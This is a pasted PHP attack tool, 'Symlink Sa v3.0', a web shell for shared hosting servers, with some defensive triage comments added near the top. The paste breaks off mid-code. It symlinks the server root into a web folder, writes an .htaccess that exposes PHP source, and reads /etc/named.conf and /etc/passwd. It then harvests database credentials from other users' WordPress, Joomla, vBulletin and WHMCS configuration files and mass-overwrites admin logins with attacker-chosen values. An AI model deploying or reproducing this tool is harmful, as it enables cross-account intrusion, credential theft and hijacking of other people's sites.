jeckerx

symlink.php

Feb 9th, 2013
  1. <?php
  2.  
  3.  
  4. /*
  5.  
  6. .d8888. d88888b .o88b. db d8b db .o88b. .d88b. .88b d88.
  7. 88' YP 88' d8P Y8 88 I8I 88 d8P Y8 .8P Y8. 88'YbdP`88
  8. `8bo. 88ooooo 8P 88 I8I 88 8P 88 88 88 88 88
  9. `Y8b. 88~~~~~ 8b C8888D Y8 I8I 88 8b 88 88 88 88 88
  10. db 8D 88. Y8b d8 `8b d8'8b d8' db Y8b d8 `8b d8' 88 88 88
  11. `8888Y' Y88888P `Y88P' `8b8' `8d8' VP `Y88P' `Y88P' YP YP YP
  12.  
  13.  
  14. author..............: s3n4t00r
  15. home................: sec-w.com
  16. twitter.............: @s3n4t00r
  17. name tools..........: Symlink Sa v3.0
  18.  
  19. */
  20.  
  21.  
  22.  
  // Start-up: remove PHP's execution time limit and switch off all error reporting, then
  // derive the HTTP and FTP base URLs of the directory this script was requested from.
  // Triage note: silencing errors and lifting the time limit ahead of bulk filesystem and
  // network work is a common static signal when hunting for web shells in a docroot.
  23. set_time_limit(0);
  24. error_reporting(0);
  25.  
  26.  
  // Built from SERVER_NAME and REQUEST_URI, both of which are influenced by the request;
  // nothing is validated or escaped here. The scheme is hard-coded to http.
  27. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  28. $u = explode("/",$pageURL );
  // Drops the last '/'-separated segment (script name plus any query string). str_replace()
  // removes every occurrence of that segment in the URL, not only the trailing one.
  29. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  30.  
  // Same construction for an ftp:// URL with a fixed '/public_html/' component; the result is
  // later interpolated into link hrefs in the 'passwd' branch of this file.
  31. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  32. $u = explode("/",$pageFTP );
  33. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  34.  
  35. ?>
  36. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  37. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  38.  
  39. <html xmlns="http://www.w3.org/1999/xhtml">
  40.  
  41. <head>
  42. <title>Symlink_Sa 3.0</title>
  43.  
  44. <style type="text/css">
  45.  
  46. html,body {
  47. margin: 0;
  48. padding: 0;
  49. outline: 0;
  50. }
  51. a{
  52.  
  53. font-size: 13px;
  54.  
  55. }
  56.  
  57.  
  58. body {
  59. direction: ltr;
  60. background-color:#F4F4F4;
  61. color: rgb(153, 153, 153);
  62. text-align: center
  63. }
  64.  
  65.  
  66.  
  67. input,textarea,select{
  68. font-weight: bold;
  69. color: #000000;
  70. }
  71.  
  72. input,textarea,select:hover{
  73. box-shadow: 0px 0px 4px #AAAAAA;
  74. }
  75.  
  76.  
  77. .hedr {
  78. font-family: Tahoma, Arial, sans-serif ;
  79. font-size: 22px;
  80.  
  81.  
  82. }
  83.  
  84. .cont a{
  85.  
  86. text-decoration: none;
  87. color:rgb(153, 153, 153);
  88. font-family: Tahoma, Arial, sans-serif ;
  89. font-size: 16px;
  90. text-shadow: 0px 0px 3px ;
  91. }
  92.  
  93. .cont a:hover{
  94.  
  95.  
  96. color: #EEEEEE ;
  97. text-shadow:0px 0px 3px #000000 ;
  98.  
  99.  
  100. }
  101.  
  102. .tmp tr td{
  103.  
  104. border: solid 1px #BBBBBB;
  105.  
  106. padding: 2px ;
  107. font-size: 13px;
  108. }
  109.  
  110. .tmp tr td a {
  111. text-decoration: none;
  112.  
  113.  
  114.  
  115. }
  116.  
  117. .foter{
  118. font-size: 9pt;
  119. color: #AAAAAA ;
  120. text-align: center
  121. }
  122.  
  123. .tmp tr td:hover{
  124.  
  125. box-shadow: 0px 0px 4px #888888;
  126.  
  127. }
  128. .fot{
  129.  
  130. font-family:Tahoma, Arial, sans-serif;
  131.  
  132. font-size: 11pt;
  133. }
  134. .for a : hover{
  135.  
  136. text-shadow: 0px 0px 1px #3366FF;
  137.  
  138. }
  139.  
  140.  
  141. .ir {
  142. color: #FF0000;
  143. }
  144.  
  145.  
  146.  
  147. </style>
  148.  
  149. </head>
  150.  
  151. <body>
  152.  
  153. <div class='all'>
  154.  
  155.  
  156. <?php
  157.  
  // Runs on every request, before any menu choice is read: creates a 'sym' directory beside
  // the script, writes an .htaccess into it, links the filesystem root into it, then prints
  // the page header and navigation menu.
  // Mode 0777 is requested (the effective mode is still subject to umask); '@' hides failure.
  158. @mkdir('sym',0777);
  // .htaccess payload: turns on all Options, re-types .php and .html as text/plain and
  // reassigns their handlers, and adds 'Require None' / 'Satisfy Any'.
  // NOTE(review): the apparent intent is that files reached through this directory are served
  // as source text rather than executed; whether it takes effect depends on the server's
  // AllowOverride settings and Apache version — confirm against the host configuration.
  159. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  // The handle is neither checked nor closed in this block; if fopen() fails, fwrite() is
  // handed false and the failure stays invisible because error reporting is off.
  160. $f =@fopen ('sym/.htaccess','w');
  161. fwrite($f , $htcs);
  162.  
  163.  
  164.  
  // Symlink named sym/root pointing at '/'. Other branches of this file build links of the
  // form sym/root/home/<user>/public_html on top of it.
  // Detection: symlinks under a web root whose target lies outside the owning account's
  // directory, and freshly written .htaccess files that map .php to text/plain.
  // Mitigation commonly used on shared Apache hosts (verify for the platform in question):
  // SymLinksIfOwnerMatch instead of FollowSymLinks, AllowOverride that excludes Options and
  // FileInfo, and open_basedir / disable_functions covering symlink().
  165. @symlink("/","sym/root");
  166.  
  // Own file name; used further down as the target of the form action attributes.
  167. $pg = basename(__FILE__);
  168.  
  169. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  170.  
  171. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  172.  
  // Navigation menu: every link sets the 'sws' request parameter, which the switch on
  // $_REQUEST['sws'] below uses to pick a branch. These title strings and parameter values
  // are stable text to match on in file-content or access-log searches.
  173. echo '<div class="cont">
  174.  
  175. [<a href="?"> Home </a>]
  176.  
  177. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  178.  
  179. [<a href="?sws=sec"> Domains & Script </a>]
  180.  
  181. [ <a href="?sws=file"> Symlink File </a>]
  182.  
  183. [<a href="?sws=passwd"> Symlink Bypass </a>]
  184.  
  185. <br /><br />
  186.  
  187. [ <a href="?sws=read"> Bypass Read </a>]
  188.  
  189. [ <a href="?sws=joomla"> Mass Joomla </a>]
  190.  
  191. [ <a href="?sws=wp"> Mass WordPress </a>]
  192.  
  193. [ <a href="?sws=vb"> Mass vBulletin </a>]
  194.  
  195. [ <a href="?sws=help"> Help </a>]
  196.  
  197. <br /><br /><br />
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204. </div>';
  205.  
  206. if(isset($_REQUEST['sws']))
  207. {
  208.  
  209. switch ($_REQUEST['sws'])
  210. {
  211.  
  212.  
  213.  
  214.  
  215.  
  216. /// Domains + Scripts ///
  217.  
  218. case 'sec':
  219.  
  220. if(!@is_file('named.txt')){
  221.  
  222. $d00m = @file("/etc/named.conf");
  223.  
  224. }else{
  225.  
  226. $d00m = @file("named.txt");
  227.  
  228.  
  229. }
  230. if(!$d00m)
  231. {
  232.  
  233. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  234. }
  235. else
  236.  
  237. {
  238. echo "<div class='tmp'>
  239. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  240. foreach($d00m as $dom){
  241.  
  242. flush();
  243. flush();
  244.  
  245.  
  246.  
  247. if(eregi("zone",$dom)){
  248.  
  249. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  250.  
  251. flush();
  252.  
  253. if(@strlen(trim($domsws[1][0])) > 2){
  254.  
  255. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  256.  
  257. ///////////////////////////////////////////////////////////////////////////////////
  258.  
  259. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  260. $wpp=@get_headers($wpl);
  261. $wp=$wpp[0];
  262.  
  263. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  264. $wpp2=@get_headers($wp2);
  265. $wp12=$wpp2[0];
  266.  
  267. ///////////////////////////////
  268.  
  269. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  270. $joo=@get_headers($jo1);
  271. $jo=$joo[0];
  272.  
  273.  
  274. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  275. $joo2=@get_headers($jo2);
  276. $jo12=$joo2[0];
  277.  
  278. ////////////////////////////////
  279.  
  280. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  281. $vbb=@get_headers($vb1);
  282. $vb=$vbb[0];
  283.  
  284. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  285. $vbb2=@get_headers($vb2);
  286. $vb12=$vbb2[0];
  287.  
  288. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  289. $vbb3=@get_headers($vb3);
  290. $vb13=$vbb3[0];
  291.  
  292. /////////////////
  293.  
  294. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  295. $whh2= @get_headers($wh1);
  296. $wh=$whh2[0];
  297.  
  298. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  299. $whh2= @get_headers($wh2);
  300. $wh12=$whh2[0];
  301.  
  302. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  303. $whh3= @get_headers($wh3);
  304. $wh13=$whh3[0];
  305.  
  306. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  307. $whh5= @get_headers($wh5);
  308. $wh15=$whh5[0];
  309.  
  310. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  311. $whh4= @get_headers($wh4);
  312. $wh14=$whh4[0];
  313.  
  314.  
  315.  
  316. ////////////////////////////////////////////////////////////////////////////////
  317.  
  318. ////////// Wordpress ////////////
  319.  
  320. $pos = strpos($wp, "200");
  321. $config="&nbsp;";
  322.  
  323. if (strpos($wp, "200") == true )
  324. {
  325. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  326. }
  327. elseif (strpos($wp12, "200") == true)
  328. {
  329. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  330. }
  331.  
  332. ///////////WHMCS////////
  333.  
  334. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  335. {
  336. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  337.  
  338. }
  339. elseif (strpos($wh12, "200") == true)
  340. {
  341. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  342. }
  343.  
  344. elseif (strpos($wh13, "200") == true)
  345. {
  346. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  347.  
  348. }
  349.  
  350. ///////// Joomla to 4 ///////////
  351.  
  352. elseif (strpos($jo, "200") == true)
  353. {
  354. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  355. }
  356.  
  357. elseif (strpos($jo12, "200") == true)
  358. {
  359. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  360. }
  361.  
  362. //////////vBulletin to 4 ///////////
  363.  
  364. elseif (strpos($vb, "200") == true)
  365. {
  366. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  367. }
  368.  
  369. elseif (strpos($vb12, "200") == true)
  370. {
  371. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  372. }
  373.  
  374. elseif (strpos($vb13, "200") == true)
  375. {
  376. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  377. }
  378.  
  379. else
  380. {
  381. continue;
  382. }
  383. flush();
  384. flush();
  385.  
  386. /////////////////////////////////////////////////////////////////////////////////////
  387.  
  388.  
  389.  
  390. $site = $user['name'] ;
  391.  
  392.  
  393.  
  394. flush();
  395.  
  396. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  397. <td>".$config."</td></tr>"; flush();
  398.  
  399. }
  400. }
  401. }
  402. }
  403.  
  404.  
  405.  
  406.  
  407. break;
  408.  
  409.  
  410. /// user + domain + symlink ///
  411.  
  412. case 'sym':
  413.  
  414. if(!is_file('named.txt')){
  415.  
  416. $d00m = @file("/etc/named.conf");
  417.  
  418. }else{
  419.  
  420. $d00m = @file("named.txt");
  421.  
  422.  
  423. }
  424. if(!$d00m)
  425. {
  426.  
  427. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  428. }
  429. else
  430.  
  431. {
  432. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  433. foreach($d00m as $dom){
  434.  
  435. if(eregi("zone",$dom)){
  436.  
  437. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  438.  
  439. flush();
  440.  
  441. if(strlen(trim($domsws[1][0])) > 2){
  442.  
  443. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  444.  
  445. flush();
  446.  
  447.  
  448.  
  449. $site = $user['name'] ;
  450.  
  451.  
  452. @symlink("/","sym/root");
  453.  
  454. $site = $domsws[1][0];
  455.  
  456. $ir = 'ir';
  457.  
  458. $il = 'il';
  459.  
  460. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  461. {
  462. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  463. }
  464.  
  465.  
  466. echo "
  467. <tr>
  468.  
  469. <td>
  470. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  471. </td>
  472.  
  473.  
  474. <td>
  475. ".$user['name']."
  476. </td>
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483. <td>
  484. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  485. </td>
  486.  
  487.  
  488. </tr></div> ";
  489.  
  490.  
  491. flush();
  492. flush();
  493.  
  494. }
  495. }
  496. }
  497. }
  498.  
  499.  
  500.  
  501.  
  502. break;
  503.  
  504.  
  505. /// file symlink ///
  506.  
  507. case 'file':
  508.  
  509. echo'
  510. The file path to symlink
  511.  
  512. <br /><br />
  513. <form method="post">
  514. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  515. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  516. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  517.  
  518.  
  519.  
  520. </form>
  521. ';
  522.  
  523. $pfile = $_POST['file'];
  524. $symfile = $_POST['symfile'];
  525. $symlink = $_POST['symlink'];
  526.  
  527. if ($symlink)
  528. {
  529.  
  530.  
  531. @mkdir('sym1',0777);
  532. $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  533. $f =@fopen ('sym1/.htaccess','w');
  534. @fwrite($f , $c);
  535.  
  536. @symlink("$pfile","sym1/$symfile");
  537.  
  538. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  539.  
  540. }
  541.  
  542.  
  543.  
  544. break;
  545.  
  546. /// bypass read
  547.  
  548. case 'read':
  549.  
  550. echo "read /etc/named.conf";
  551. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  552. flush();
  553. flush();
  554.  
  555.  
  556. $file = '/etc/named.conf';
  557.  
  558.  
  559. $r3ad = @fopen($file, 'r');
  560. if ($r3ad){
  561. $content = @fread($r3ad, @filesize($file));
  562. echo "".htmlentities($content)."";
  563. }
  564. else if (!$r3ad)
  565. {
  566. $r3ad = @show_source($file) ;
  567. }
  568. else if (!$r3ad)
  569. {
  570. $r3ad = @highlight_file($file);
  571. }
  572. else if (!$r3ad)
  573. {
  574. $sm = @symlink($file,'sym.txt');
  575.  
  576.  
  577. if ($sm){
  578. $r3ad = @fopen('sym/sym.txt', 'r');
  579. $content = @fread($r3ad, @filesize($file));
  580. echo "".htmlentities($content)."";
  581.  
  582. }
  583. }
  584.  
  585.  
  586.  
  587. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  588.  
  589.  
  590. if(isset($_GET['save'])){
  591.  
  592.  
  593. $cont = stripcslashes($_POST['file']);
  594.  
  595. $f = fopen('named.txt','w');
  596.  
  597. $w = fwrite($f,$cont);
  598.  
  599. if($w){
  600.  
  601. echo '<br />save has been successfully';
  602.  
  603. }
  604.  
  605. fclose($f);
  606.  
  607.  
  608.  
  609.  
  610. }
  611.  
  612.  
  613.  
  614. break;
  615.  
  616. // passwd
  617.  
  618. case 'passwd':
  619.  
  620. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  621.  
  622.  
  623. $cont = stripcslashes($_POST['file']);
  624.  
  625. if(!file_exists('passwd.txt')){
  626.  
  627. $f = @fopen('passwd.txt','w');
  628.  
  629. $w = @fwrite($f,$cont);
  630.  
  631. fclose($f);
  632. }
  633. if($w or @filesize('passwd.txt') > 0){
  634. // * SHOW * //
  635.  
  636. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  637. flush();
  638.  
  639. $fil3 = file('passwd.txt');
  640.  
  641. foreach ($fil3 as $f){
  642.  
  643. $u=explode(':', $f);
  644. $user = $u['0'];
  645.  
  646.  
  647.  
  648. echo "
  649. <tr>
  650.  
  651.  
  652.  
  653. <td width='15%'>
  654. $user
  655. </td>
  656.  
  657.  
  658.  
  659.  
  660.  
  661.  
  662. <td width='10%'>
  663. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  664. </td>
  665.  
  666. <td width='10%'>
  667. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  668. </td>
  669.  
  670.  
  671.  
  672. </tr></div> ";
  673.  
  674.  
  675. flush();
  676. flush();
  677.  
  678.  
  679. }
  680.  
  681.  
  682.  
  683.  
  684.  
  685.  
  686. die ("</tr></div>");
  687.  
  688.  
  689. }
  690.  
  691.  
  692.  
  693.  
  694.  
  695. }
  696.  
  697.  
  698.  
  699. echo "read /etc/passwd";
  700. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  701. flush();
  702.  
  703. $file = '/etc/passwd';
  704.  
  705.  
  706. $r3ad = @fopen($file, 'r');
  707. if ($r3ad){
  708. $content = @fread($r3ad, @filesize($file));
  709. echo "".htmlentities($content)."";
  710. }
  711. elseif(!$r3ad)
  712. {
  713. $r3ad = @show_source($file) ;
  714. }
  715. elseif(!$r3ad)
  716. {
  717. $r3ad = @highlight_file($file);
  718. }
  719. elseif(!$r3ad)
  720. {
  721.  
  722. for($uid=0;$uid<1000;$uid++){
  723. $ara = posix_getpwuid($uid);
  724. if (!empty($ara)) {
  725. while (list ($key, $val) = each($ara)){
  726. print "$val:";
  727. }
  728. print "\n";
  729. }
  730.  
  731. }
  732.  
  733. }
  734.  
  735.  
  736. flush();
  737.  
  738.  
  739. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  740. flush();
  741.  
  742. break;
  743.  
  744.  
  745.  
  746. case 'joomla':
  747.  
  748. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  749.  
  750.  
  751. if(isset($_POST['s'])){
  752.  
  753. $file = @file_get_contents('joomla.txt');
  754.  
  755. $ex = explode("\n",$file);
  756.  
  757. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  758. flush();
  759.  
  760.  
  761. foreach ($ex as $exp){
  762.  
  763. $es = explode("||",$exp);
  764.  
  765. $config = $es[0];
  766.  
  767. $domin = $es[1];
  768.  
  769. $domins = trim($domin).'';
  770.  
  771. $readconfig = @file_get_contents(trim($config));
  772.  
  773. if(ereg('JConfig',$readconfig)){
  774.  
  775.  
  776.  
  777. $pass = ex($readconfig,'$password = \'',"';");
  778.  
  779. $userdb = ex($readconfig,'$user = \'',"';");
  780.  
  781. $db = ex($readconfig,'$db = \'',"';");
  782.  
  783. $fix = ex($readconfig,'$dbprefix = \'',"';");
  784.  
  785. $tab = $fix.'users';
  786.  
  787.  
  788. $con = @mysql_connect('localhost',$userdb,$pass);
  789.  
  790. $db = @mysql_select_db($db,$con);
  791.  
  792. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
  793.  
  794.  
  795. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  796.  
  797.  
  798. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  799.  
  800. $domins = trim($domin).'';
  801.  
  802. echo "<tr>
  803. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  804. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  805. flush();
  806.  
  807.  
  808.  
  809. }else{
  810.  
  811. echo "<tr>
  812. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  813. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  814. flush();
  815.  
  816. }
  817.  
  818. }
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827.  
  828. die();
  829.  
  830. }
  831.  
  832. if(!is_file('named.txt')){
  833.  
  834. $d00m = @file("/etc/named.conf");
  835.  
  836. flush();
  837.  
  838.  
  839. }else{
  840.  
  841. $d00m = file("named.txt");
  842.  
  843.  
  844. }
  845. if(!$d00m)
  846. {
  847.  
  848. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  849. }
  850. else
  851.  
  852. {
  853. echo "<div class='tmp'>
  854. <form method='POST' action='$pg?sws=joomla'>
  855. <input type='submit' value='Mass ching Admin' />
  856. <input type='hidden' value='1' name='s' />
  857. </form><br /><br />
  858. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  859.  
  860. $f = fopen('joomla.txt','w');
  861.  
  862. foreach($d00m as $dom){
  863.  
  864. if(eregi("zone",$dom)){
  865.  
  866. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  867.  
  868. if(strlen(trim($domsws[1][0])) > 2){
  869.  
  870. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  871.  
  872. ///////////////////////////////////////////////////////////////////////////////////
  873.  
  874. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  875. $wpp=get_headers($wpl);
  876. $wp=$wpp[0];
  877.  
  878. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  879. $wpp2=get_headers($wp2);
  880. $wp12=$wpp2[0];
  881.  
  882. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  883. $wpp3=get_headers($wp3);
  884. $wp13=$wpp3[0];
  885.  
  886.  
  887. ////////// joomla ////////////
  888.  
  889. $pos = strpos($wp, "200");
  890. $config="&nbsp;";
  891.  
  892. if (strpos($wp, "200") == true )
  893. {
  894. $config= $wpl;
  895. }
  896. elseif (strpos($wp12, "200") == true)
  897. {
  898. $config= $wp2;
  899. }
  900. elseif (strpos($wp13, "200") == true)
  901. {
  902. $config= $wp3;
  903. }
  904. else
  905. {
  906. continue;
  907.  
  908. }
  909. flush();
  910.  
  911. /////////////////////////////////////////////////////////////////////////////////////
  912.  
  913. $dom = $domsws[1][0];
  914.  
  915. $w = fwrite($f,"$config||$dom \n");
  916. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  917.  
  918.  
  919. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  920. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  921.  
  922.  
  923.  
  924.  
  925.  
  926. flush();
  927.  
  928.  
  929. }
  930. }
  931. }
  932. }
  933.  
  934.  
  935. break;
  936.  
  937. case 'wp':
  938.  
  939. ############################ index #########################3
  940.  
  941.  
  942.  
  943.  
  944.  
  945.  
  946. ######## admin ##########33
  947.  
  948. if(isset($_POST['s'])){
  949.  
  950. $file = @file_get_contents('wp.txt');
  951.  
  952. $ex = explode("\n",$file);
  953.  
  954. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  955. flush();
  956. flush();
  957.  
  958.  
  959. foreach ($ex as $exp){
  960.  
  961. $es = explode("||",$exp);
  962.  
  963. $config = $es[0];
  964.  
  965. $domin = $es[1];
  966.  
  967. $domins = trim($domin).'';
  968.  
  969. $readconfig = @file_get_contents(trim($config));
  970.  
  971. if(ereg('wp-settings.php',$readconfig)){
  972.  
  973.  
  974.  
  975. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
  976.  
  977. $userdb = ex($readconfig,"define('DB_USER', '","');");
  978.  
  979. $db = ex($readconfig,"define('DB_NAME', '","');");
  980.  
  981. $fix = ex($readconfig,'$table_prefix = \'',"';");
  982.  
  983. $tab = $fix.'users';
  984.  
  985. $con = @mysql_connect('localhost',$userdb,$pass);
  986.  
  987. $db = @mysql_select_db($db,$con);
  988.  
  989. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  990.  
  991. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  992.  
  993.  
  994.  
  995. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  996.  
  997. else
  998.  
  999. {
  1000.  
  1001. $r = '<b style="color:red">failed</b>';
  1002.  
  1003. }
  1004.  
  1005. $domins = trim($domin).'';
  1006.  
  1007. echo "<tr>
  1008. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1009. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1010.  
  1011. flush();
  1012. flush();
  1013.  
  1014.  
  1015.  
  1016.  
  1017.  
  1018.  
  1019. }else{
  1020.  
  1021. echo "<tr>
  1022. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1023. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1024.  
  1025. flush();
  1026. flush();
  1027.  
  1028. }
  1029.  
  1030. }
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038.  
  1039.  
  1040.  
  1041. die();
  1042.  
  1043. }
  1044.  
  1045. if(!is_file('named.txt')){
  1046.  
  1047. $d00m = @file("/etc/named.conf");
  1048.  
  1049. }else{
  1050.  
  1051. $d00m = @file("named.txt");
  1052.  
  1053.  
  1054. }
  1055. if(!$d00m)
  1056. {
  1057.  
  1058. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1059. }
  1060. else
  1061.  
  1062. {
  1063. echo "<div class='tmp'>
  1064. <form method='POST' action='$pg?sws=wp'>
  1065. <input type='submit' value='Mass Change Admin' />
  1066. <input type='hidden' value='1' name='s' />
  1067. </form>
  1068. <br /><br />
  1069. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1070.  
  1071. flush();
  1072. flush();
  1073.  
  1074. $f = fopen('wp.txt','w');
  1075.  
  1076. foreach($d00m as $dom){
  1077.  
  1078. if(eregi("zone",$dom)){
  1079.  
  1080. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1081.  
  1082. if(strlen(trim($domsws[1][0])) > 2){
  1083.  
  1084. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1085.  
  1086. ///////////////////////////////////////////////////////////////////////////////////
  1087.  
  1088. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1089. $wpp=get_headers($wpl);
  1090. $wp=$wpp[0];
  1091.  
  1092. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1093. $wpp2=get_headers($wp2);
  1094. $wp12=$wpp2[0];
  1095.  
  1096. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1097. $wpp3=get_headers($wp3);
  1098. $wp13=$wpp3[0];
  1099.  
  1100.  
  1101. ////////// wp ////////////
  1102.  
  1103. $pos = strpos($wp, "200");
  1104. $config="&nbsp;";
  1105.  
  1106. if (strpos($wp, "200") == true )
  1107. {
  1108. $config= $wpl;
  1109. }
  1110. elseif (strpos($wp12, "200") == true)
  1111. {
  1112. $config= $wp2;
  1113. }
  1114. elseif (strpos($wp13, "200") == true)
  1115. {
  1116. $config= $wp3;
  1117. }
  1118. else
  1119. {
  1120. continue;
  1121.  
  1122. }
  1123. flush();
  1124.  
  1125. /////////////////////////////////////////////////////////////////////////////////////
  1126.  
  1127. $dom = $domsws[1][0];
  1128.  
  1129. $w = fwrite($f,"$config||$dom \n");
  1130. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1131.  
  1132.  
  1133. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1134. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1135. flush();
  1136. flush();
  1137.  
  1138.  
  1139.  
  1140.  
  1141.  
  1142. flush();
  1143.  
  1144.  
